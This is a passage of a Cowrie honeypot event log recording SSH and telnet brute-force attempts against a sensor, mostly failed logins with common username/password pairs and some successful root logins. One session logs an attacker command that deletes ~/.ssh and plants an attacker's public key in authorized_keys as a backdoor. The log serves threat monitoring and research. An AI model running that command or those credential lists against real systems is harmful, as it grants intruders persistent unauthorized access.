CS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:27:27.163403Z","src_ip":"212.227.235.229","session":"1908355279c6"}
{"eventid":"cowrie.login.failed","username":"jira","password":"1234567","message":"login attempt [jira/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T02:27:28.405273Z","src_ip":"212.227.235.229","session":"1908355279c6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:29.706433Z","src_ip":"212.227.235.229","session":"1908355279c6"}
{"eventid":"cowrie.session.connect","src_ip":"42.112.65.123","src_port":38697,"dst_ip":"1.2.3.4","dst_port":23,"session":"145dc90b928a","protocol":"telnet","message":"New connection: 42.112.65.123:38697 (1.2.3.4:23) [session: 145dc90b928a]","sensor":"my-vps","timestamp":"2025-09-09T02:27:45.984061Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51680,"dst_ip":"1.2.3.4","dst_port":22,"session":"9267c53e8d54","protocol":"ssh","message":"New connection: 212.227.235.229:51680 (1.2.3.4:22) [session: 9267c53e8d54]","sensor":"my-vps","timestamp":"2025-09-09T02:27:50.365132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:27:50.373629Z","src_ip":"212.227.235.229","session":"9267c53e8d54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:27:50.620073Z","src_ip":"212.227.235.229","session":"9267c53e8d54"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"pass","message":"login attempt [hacker/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T02:27:51.622072Z","src_ip":"212.227.235.229","session":"9267c53e8d54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37922,"dst_ip":"1.2.3.4","dst_port":22,"session":"689f7718243d","protocol":"ssh","message":"New connection: 212.227.235.229:37922 (1.2.3.4:22) [session: 689f7718243d]","sensor":"my-vps","timestamp":"2025-09-09T02:27:51.975739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:27:51.978109Z","src_ip":"212.227.235.229","session":"689f7718243d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:27:52.357589Z","src_ip":"212.227.235.229","session":"689f7718243d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:52.878961Z","src_ip":"212.227.235.229","session":"9267c53e8d54"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"1","message":"login attempt [muhammad/1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:27:53.907695Z","src_ip":"212.227.235.229","session":"689f7718243d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:55.288155Z","src_ip":"212.227.235.229","session":"689f7718243d"}
{"eventid":"cowrie.session.closed","duration":12.794601440429688,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:58.778566Z","src_ip":"42.112.65.123","session":"145dc90b928a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45958,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce2025b256ee","protocol":"telnet","message":"New connection: 212.227.125.160:45958 (1.2.3.4:23) [session: ce2025b256ee]","sensor":"my-vps","timestamp":"2025-09-09T02:28:06.604249Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11760,"dst_ip":"1.2.3.4","dst_port":22,"session":"99776f9a8061","protocol":"ssh","message":"New connection: 185.152.45.241:11760 (1.2.3.4:22) [session: 99776f9a8061]","sensor":"my-vps","timestamp":"2025-09-09T02:28:06.774266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:28:06.784464Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:28:06.864428Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.login.success","username":"root","password":"solomon","message":"login attempt [root/solomon] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.075663Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:28:07.268008Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.268785Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.270168Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.328860Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:28:07.435017Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.435835Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.484054Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.484985Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11761,"dst_ip":"1.2.3.4","dst_port":22,"session":"2aa989c7dd35","protocol":"ssh","message":"New connection: 185.152.45.241:11761 (1.2.3.4:22) [session: 2aa989c7dd35]","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.528413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.533279Z","src_ip":"185.152.45.241","session":"2aa989c7dd35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.578970Z","src_ip":"185.152.45.241","session":"2aa989c7dd35"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:28:07.819260Z","src_ip":"185.152.45.241","session":"2aa989c7dd35"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:08.870024Z","src_ip":"185.152.45.241","session":"2aa989c7dd35"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11758,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bf83012ab58","protocol":"ssh","message":"New connection: 185.152.45.241:11758 (1.2.3.4:22) [session: 4bf83012ab58]","sensor":"my-vps","timestamp":"2025-09-09T02:28:08.913663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:28:08.914302Z","src_ip":"185.152.45.241","session":"4bf83012ab58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:28:08.958639Z","src_ip":"185.152.45.241","session":"4bf83012ab58"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:28:09.193884Z","src_ip":"185.152.45.241","session":"4bf83012ab58"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:09.238995Z","src_ip":"185.152.45.241","session":"99776f9a8061"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:09.240273Z","src_ip":"185.152.45.241","session":"4bf83012ab58"}
{"eventid":"cowrie.session.closed","duration":12.923553705215454,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:19.527729Z","src_ip":"212.227.125.160","session":"ce2025b256ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:21.895650Z","src_ip":"212.227.125.160","session":"5f673f495201"}
{"eventid":"cowrie.session.closed","duration":180.1574249267578,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:21.901995Z","src_ip":"212.227.125.160","session":"5f673f495201"}
{"eventid":"cowrie.session.closed","duration":"301.9","message":"Connection lost after 301.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:25.185088Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52854,"dst_ip":"1.2.3.4","dst_port":22,"session":"92960a780422","protocol":"ssh","message":"New connection: 212.227.235.229:52854 (1.2.3.4:22) [session: 92960a780422]","sensor":"my-vps","timestamp":"2025-09-09T02:28:31.640742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:28:31.642585Z","src_ip":"212.227.235.229","session":"92960a780422"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:28:31.952449Z","src_ip":"212.227.235.229","session":"92960a780422"}
{"eventid":"cowrie.login.failed","username":"gateway","password":"gateway","message":"login attempt [gateway/gateway] failed","sensor":"my-vps","timestamp":"2025-09-09T02:28:33.195433Z","src_ip":"212.227.235.229","session":"92960a780422"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:28:34.507764Z","src_ip":"212.227.235.229","session":"92960a780422"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36177,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb6264244d24","protocol":"ssh","message":"New connection: 212.227.235.229:36177 (1.2.3.4:22) [session: eb6264244d24]","sensor":"my-vps","timestamp":"2025-09-09T02:29:01.985259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:01.986591Z","src_ip":"212.227.235.229","session":"eb6264244d24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:02.238834Z","src_ip":"212.227.235.229","session":"eb6264244d24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35666,"dst_ip":"1.2.3.4","dst_port":22,"session":"580de0916d9c","protocol":"ssh","message":"New connection: 212.227.235.229:35666 (1.2.3.4:22) [session: 580de0916d9c]","sensor":"my-vps","timestamp":"2025-09-09T02:29:02.779109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:02.786911Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:03.159901Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"P@ssw0rd","message":"login attempt [elastic/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T02:29:03.283657Z","src_ip":"212.227.235.229","session":"eb6264244d24"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:04.538075Z","src_ip":"212.227.235.229","session":"eb6264244d24"}
{"eventid":"cowrie.login.success","username":"root","password":"Ll123456789","message":"login attempt [root/Ll123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:29:04.663267Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
